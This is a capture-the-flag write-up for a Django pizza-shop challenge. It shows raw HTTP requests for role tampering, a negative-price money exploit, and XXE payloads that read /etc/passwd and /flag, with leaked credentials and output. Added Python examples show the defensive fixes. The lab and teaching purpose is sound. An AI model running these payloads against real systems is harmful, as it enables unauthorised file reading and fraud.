@pich4ya
Last active February 11, 2018 16:30
https://junior.34c3ctf.ccc.ac/ writeup pizzagate - hard-ish 401
chall:
We found this pizza shop. It seems to be under construction currently, but we believe the whole shop is just a front for some fishy business. Is the Italian Mafia behind all this?
Grab your OWASP Top 10 list and investigate! We need to find out what's going on!
Hints:
For the basic authentication step: Have you checked out A1 in your list? And the HTTP response headers?
http://35.198.69.56/
1) the site has debug mode enabled (stacktrace + detailed error); requesting a path that does not exist lists the URL patterns:
http://35.198.69.56/x
^$ [name='index']
^admin
^robots.txt$
^foobarbaz/
^static\/(?P<path>.*)$
2) basic auth - http://35.198.69.56/foobarbaz/
HTTP/1.1 401 Unauthorized
Server: nginx/1.12.1 (Ubuntu)
Date: Fri, 29 Dec 2017 05:15:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close
WWW-Authenticate: Basic realm=devs_only
X-Frame-Options: SAMEORIGIN
3) read the error: log in as admin with a password consisting of a single double quote (admin:")
Authorization: Basic YWRtaW46Ig%3d%3d
https://gist.github.com/pich4ya/1a199bf720ad773d4bea218729d323fe
I noticed
(b'<?xml version="1.0" encoding="UTF-8" ?>\n <users>\n '
b' <user>\n <firstname>Bernd</firstname>\n '
b' <lastname>Brot</lastname>\n <login>bernd</logi'
b'n>\n <password>berndberndbernd</password>\n '
b' <role>inactive</role>\n </user>\n <u'
b'ser>\n <firstname>Shia</firstname>\n '
b' <lastname>TheOneANdOnly</lastname>\n <login>sh1a</log'
b'in>\n <password>just_do_it_goddamnit</password>\n '
b' <role>admin</role>\n </user>\n </u'
b'sers>\n ')
django 2.0
python 3.6.3
/app/foobarbaz/views.py
0.0.0.0:1337
dbms:mysql
installed apps: pizzagate, foobarbaz
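The 401 in step 2 and the crash in step 3 both come from the Basic-auth check: a password of just a double quote was enough to turn the login into a detailed error page that leaked the users file. The following is an added example, not code from the gist or from the challenge, of how a defender would parse the Authorization header so that malformed or odd credentials always end in a plain 401 rather than an exception. The USERS dictionary is a constructed stand-in for the challenge's users.xml and stores plaintext passwords only to keep the sample short.

```python
import base64
import binascii
import hmac
from typing import Optional, Tuple

# Constructed credential store for this example (not the challenge's users.xml).
# Plaintext passwords are used here only to keep the sample short.
USERS = {
    "bernd": ("berndberndbernd", "inactive"),
    "sh1a": ("just_do_it_goddamnit", "admin"),
}


def basic_header(login: str, password: str) -> str:
    """Build the header a client would send (handy for tests)."""
    token = base64.b64encode(f"{login}:{password}".encode()).decode()
    return "Basic " + token


def parse_basic_auth(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode an 'Authorization: Basic ...' header into (login, password).

    Returns None for anything that is not well-formed instead of raising,
    so a strange header can never surface as a stack trace.
    """
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    # RFC 7617: the login cannot contain ':', so split on the first one only;
    # the password may contain ':' or '"' and is kept verbatim.
    login, sep, password = decoded.partition(":")
    if not sep:
        return None
    return login, password


def authenticate(header: Optional[str]) -> Tuple[int, Optional[str]]:
    """Return (status_code, role). A 401 says nothing about which part failed."""
    creds = parse_basic_auth(header)
    if creds is None:
        return 401, None
    login, password = creds
    entry = USERS.get(login)
    stored_password, role = entry if entry else ("", "")
    # Constant-time compare; the dummy entry keeps timing uniform for unknown logins.
    ok = hmac.compare_digest(password.encode(), stored_password.encode())
    if entry is None or not ok:
        return 401, None
    if role == "inactive":
        return 403, None
    return 200, role
```

Note that the header captured above was sent percent-encoded (`YWRtaW46Ig%3d%3d`); with `validate=True` that is not valid base64 and simply yields a 401, whereas the properly encoded `admin:"` decodes fine and fails the password check.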
4) enter the pizza shop
http://35.198.69.56/foobarbaz/
sh1a:just_do_it_goddamnit
register & login
5) dev mode
on signup, the form posts:
username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=..&role=user
changing role to admin gives the error: Invalid value 'admin' for user role. Only 'user' and 'dev' supported.
so,
username=longcat3&password1=longcat3longcat3&password2=longcat3longcat3&csrfmiddlewaretoken=1UnExhdNDXuYC1EbIIVCpFFnnePNnfmOVzPTTjO5BJfwnC0WO6jKgFnu3DKzsc2u&role=dev
6) analysis
user can order pizza from a pre-defined list.
dev can create new pizza into the list.
Also, I found that in /foobarbaz/pizza/list, there is a hidden pizza
<!--
<li><b>Pizza itanimullI</b> - Annuit coeptis - Novus ordo seclorum - 1337€</li>
-->
I tried to create a new pizza named "Pizza itanimullI" and it didn't work. This means it already existed.
However, I couldn't order it because the price is 1337 euro and newly created users have only 100 euro.
7) make money
With trial and error: if a dev user creates a new pizza with a negative price, the dev can gain money by ordering it.
7.1) create pizza with -1338 euro
POST /foobarbaz/pizza/create HTTP/1.1
csrfmiddlewaretoken=coYn78UOTCPLpEEhX0rJc0mn08XQbzl4sUTuxWaKFct3DnMSunMUUNkJvXq49B32&name=letmein2&toppings=letmein2&price=-1338
7.2) buy it
POST /foobarbaz/order/create HTTP/1.1
csrfmiddlewaretoken=pUlsAF3ayvWgBsD8FE3TVgFGblZiQIBEFqgz0tj6k5AyPbLJc1o4D3D2GaswOKjC&pizza=letmein2
dev user will get +1338 euro
In addition, if you try to make money with a too-large integer, the page prints a detailed error with some hints (illuminati keywords): the balance in the UPDATE below, 2147483745, is above the maximum of a MySQL signed INT column (2147483647), so the save fails and debug mode shows the view's code.
query
(b'UPDATE `foobarbaz_userprofile` SET `user_id` = 189, `balance` = 2147483745, '
b"`role` = 'dev', `is_illuminati` = 0, `created_at` = '2017-12-29 16:31:22.936" <<
b"691' WHERE `foobarbaz_userprofile`.`id` = 189")
...
if enough_balance:
order = Order(user=req.user, pizza=pizza)
order.save()
if pizza.name == FLAG_PIZZA: <<
req.user.profile.is_illuminati = True <<
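The money bug in step 7 is a missing bounds check on a value only devs can set, and the error in the query above is the same missing check hitting the database column instead. As an added example, not code from the gist or the challenge, the block below puts the unchecked charge that the writeup's behaviour implies next to a hardened version that validates the price field and the balance before anything is saved. Function names, the 100 euro starting balance and the INT bounds are assumptions for the example; the view in the challenge is only partially visible above.

```python
import re

# Bounds of a MySQL signed INT column, which the UPDATE query above overflowed.
MYSQL_INT_MIN = -(2 ** 31)
MYSQL_INT_MAX = 2 ** 31 - 1
STARTING_BALANCE = 100  # new users start with 100 euro, per the writeup


class InvalidPrice(ValueError):
    pass


class InsufficientBalance(ValueError):
    pass


def validate_price(price) -> int:
    """Accept only a positive integer that fits the DB column."""
    if isinstance(price, bool) or not isinstance(price, int):
        raise InvalidPrice(f"price must be an integer, got {price!r}")
    if price <= 0:
        raise InvalidPrice("price must be positive")
    if price > MYSQL_INT_MAX:
        raise InvalidPrice("price exceeds the column range")
    return price


def parse_price_field(value: str) -> int:
    """Parse the form's price field; rejects '-1338', '1e9', '12.5' and so on."""
    value = value.strip()
    if not re.fullmatch(r"[0-9]+", value):
        raise InvalidPrice(f"price field {value!r} is not an unsigned integer")
    return validate_price(int(value))


def charge_unchecked(balance: int, price: int) -> int:
    """What the challenge app appears to do: subtract whatever price the pizza
    carries. A negative price becomes a credit; a huge one overflows the column."""
    return balance - price


def charge(balance: int, price) -> int:
    """Hardened version: validates the price and checks funds first."""
    price = validate_price(price)
    if balance < price:
        raise InsufficientBalance(f"balance {balance} < price {price}")
    new_balance = balance - price
    # With a positive, bounded price the balance can only shrink, so it stays
    # inside the column range; the check documents the invariant.
    if not MYSQL_INT_MIN <= new_balance <= MYSQL_INT_MAX:
        raise OverflowError("balance out of column range")
    return new_balance


def order_pizza(balance: int, price_field: str):
    """Request-handler style wrapper: returns (status, balance) and never lets
    a validation failure reach a debug error page."""
    try:
        price = parse_price_field(price_field)
        return "ok", charge(balance, price)
    except (InvalidPrice, InsufficientBalance, OverflowError) as exc:
        return f"rejected: {exc}", balance
```

The same `parse_price_field` check belongs on the pizza creation form, so a dev cannot store a negative or oversized price in the first place; checking at order time as well covers rows that were created before the fix.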
8) buy the hidden pizza
with Burp, put the hidden pizza's name in the "pizza" param.
POST /foobarbaz/order/create HTTP/1.1
csrfmiddlewaretoken=NL0l1SVcuohvRWUjxmrRPvU8oNk3Apyp3hVsrGb8gYVN5F2U4JM2xiSuTCNhyrgn&pizza=Pizza itanimullI
HTTP/1.1 302 Found
Location: /foobarbaz/illuminati
9) illuminati wtf
the illuminati page displays its content with a fancy YouTube embed & graphics.
there is a hidden function where the user can submit a YouTube video id & details to the page.
<script src="/static/js/illuminati.js"></script>
...
$("#form").submit( function(form) {
    console.log(this);
    var xml = "<illuminato>";
    xml += "<details>" + this.details.value + "</details>";
    xml += "<video>" + this.video.value + "</video>";
    xml += "</illuminato>";
    $("<input />").attr("type", "hidden")
        .attr("name", "xml")
        .attr("value", xml)
        .appendTo(this);
    return true;
});
...
so the xml param contains XML built on the client side... combined with the hint "Grab your OWASP Top 10 list" = XXE?
POST /foobarbaz/illuminati HTTP/1.1
csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]><illuminato><details>sec5%26foo%3b</details><video>sec4</video></illuminato>
root:x:0:0:root:/root:/bin/bash
...
flagisinrootinthefileflag:x:1000:1000::/home/flagisinrootinthefileflag:
POST /foobarbaz/illuminati HTTP/1.1
csrfmiddlewaretoken=Mv5GWifwZ1bdS7g4lXCFzDsNokOTHFLL210Nm6vsLBPv6QoFSkXQhqq9T9h7FHtJ&details=1234x&video=1235y&xml=<!DOCTYPE x [ <!ENTITY foo SYSTEM "file:///flag"> ]><illuminato><details>sec6%26foo%3b</details><video>sec4</video></illuminato>
<div class="item text-center">
<div class="container">
<h4><b>sec634C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti
</b></h4>
</div>
flag is: 34C3_congratZ_you_know_owasp_and_are_in_the_illumi4nti
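The root cause in step 9 is that the server trusts an XML document the client assembles by string concatenation and then parses it with external entities enabled. As an added example, not code from the gist or the challenge, the block below shows the two fixes a defender would apply to that form handler: refuse any DOCTYPE or entity declaration before the real parse, and build the document server-side from the escaped details and video fields so the client-supplied xml field is never parsed at all. The element names come from illuminati.js above; the function names and the sample inputs are constructed for the example.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat
from xml.sax.saxutils import escape


class ForbiddenDTD(ValueError):
    """Raised when a submitted document carries a DOCTYPE or entity declaration."""


def reject_dtd(xml_text: str) -> None:
    """First pass over the document: abort on any DOCTYPE or entity declaration.

    Exceptions raised inside expat handlers propagate out of Parse(), so the
    caller sees ForbiddenDTD before any entity could be resolved.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenDTD(f"DOCTYPE {name!r} is not allowed")

    def on_entity_decl(*args):
        raise ForbiddenDTD("entity declarations are not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Belt and braces: returning 0 makes expat fail instead of fetching an
    # external entity such as a file:// URL.
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.Parse(xml_text, True)


def is_dtd_free(xml_text: str) -> bool:
    """Boolean form of reject_dtd, usable as a request screening check."""
    try:
        reject_dtd(xml_text)
        return True
    except (ForbiddenDTD, xml.parsers.expat.ExpatError):
        return False


def parse_illuminato(xml_text: str) -> dict:
    """Parse an <illuminato> document and return its two fields."""
    try:
        reject_dtd(xml_text)
        root = ET.fromstring(xml_text)
    except (xml.parsers.expat.ExpatError, ET.ParseError) as exc:
        raise ValueError(f"malformed XML: {exc}") from None
    if root.tag != "illuminato":
        raise ValueError("unexpected root element")
    details = root.findtext("details")
    video = root.findtext("video")
    if details is None or video is None:
        raise ValueError("missing <details> or <video>")
    return {"details": details, "video": video}


def build_illuminato(details: str, video: str) -> str:
    """Server-side replacement for the client-side concatenation in
    illuminati.js: escape the values so user input can never change the
    document structure. The client's 'xml' field is ignored entirely."""
    return (f"<illuminato><details>{escape(details)}</details>"
            f"<video>{escape(video)}</video></illuminato>")
```

`is_dtd_free` rejects the payload sent in step 9 on the DOCTYPE alone, before the `&foo;` reference is ever seen, while an ordinary `<illuminato>` document round-trips through `build_illuminato` and `parse_illuminato` with special characters intact.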